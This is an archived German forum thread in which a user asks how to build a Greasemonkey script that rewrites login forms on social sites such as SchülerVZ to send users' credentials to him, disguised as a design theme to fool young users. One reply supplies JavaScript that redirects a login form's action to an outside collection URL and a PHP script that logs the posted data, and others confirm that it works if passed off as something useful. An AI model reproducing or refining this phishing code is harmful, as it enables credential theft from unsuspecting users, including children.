PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Frage: Greasemonkey-Script, welches Logindaten an mich schickt



jayjay0ne
26.02.2010, 19:24
Wäre es eventuell beim FireFox Addon 'Greasemonkey' auf bekannten Seiten die Login Boxen zu verändern?

VeN0m
26.02.2010, 19:36
Das ganze bitte noch einmal in deutsch ;).
Je mehr Zeit Du Dir für die Problembeschreibung nimmst, desto genauer kann man antworten.

Voxi
26.02.2010, 19:54
was will er ?
ich versteh nur bahnhof:D

cookie-exploit
26.02.2010, 20:14
was willst du? :D
..drück dich bitte klar aus ;)

jayjay0ne
26.02.2010, 20:15
Könnte man ein Greasymonkey-Script so schreiben, dass es bei den Log-in Seiten der Log-In Die Daten an mich schickt...

Das ganze kann man natürlich z.B. bei SchuelerVz-designs verstecken...

Maiskorn
26.02.2010, 20:20
Ich gehe mal davon aus das er einfach nur nen Keylogger für seinen eigenen Rechner benötigt um z.B. Die usernamen und Pws von seinen Freunden bekommt wenn die sich bei ihm anmelden

M3lwin
26.02.2010, 20:21
bezweifle ich irgendwie...
ansonsten einfach selber ausprobieren, so lernst du ne ganze Menge.
Ist ja nicht allzu schwer ;)

jayjay0ne
26.02.2010, 20:29
Bei Greasmonkey kann man Seiten verändern. Schülervz, StudiVz- Designs sind ja allen bekannt...
Somit könnte man doch jetzt Seiten die Log-in box verändert, Phishing halt...
Das lässt sich besonders gut tarnen, weil man es Als Design oder Plug-In verschleier kann. Dann fallen vorallem Kiddys drauf rein...

Nein ich bin kein Idiot, der eine Keylogger für meine Freunde oder als Rache...

VeN0m
26.02.2010, 20:44
Also ich kenne Greasmonkey jetzt nicht so gut. Allerdings weiß ich, dass man damit JavaScript ausführen kann, das ist klar.
Versuchs mal mit diesem Befehl:



document.formularname.action = "http://deineseite.de/save.php";
document.formularname.method = "POST";


In der save.php kann dann z.B. folgendes stehen:



<?php

$f = fopen(strftime("%d-%m-%Y - %H:%M:%S",time().".txt"),"a");
fwrite($f,print_r($_POST));
fclose($f);

?>


Obs klappt ist dann eine andere Sache :D.

$_staX
26.02.2010, 22:12
Öhm das Greasemonkey script führst aber nur du aus ...
Will heißen, das einzige was du Phisen kannst sind deine eigenen LoginDaten

VeN0m
26.02.2010, 22:15
Aber wenn er es irgendwo hochlädt, es sich jemand lädt und es nutzt, müsste es doch gehen, oder nicht?
Dann müsste man es nur als etwas nützliches tarnen, was auf die Zielseite bezogen ist.
Ich kenne Greasmonkey, wie gesagt, nicht all zu gut, weswegen ich nur spekuliere ;).

$_staX
26.02.2010, 22:17
Dann schon ;)

jayjay0ne
27.02.2010, 05:04
Danke schonmal soweit...

Karlito
27.02.2010, 09:27
die idee ist gut, aber glaube nicht ganz neu :D
hatte das mal irgendwo gelesen das es deshalb schon probleme gab...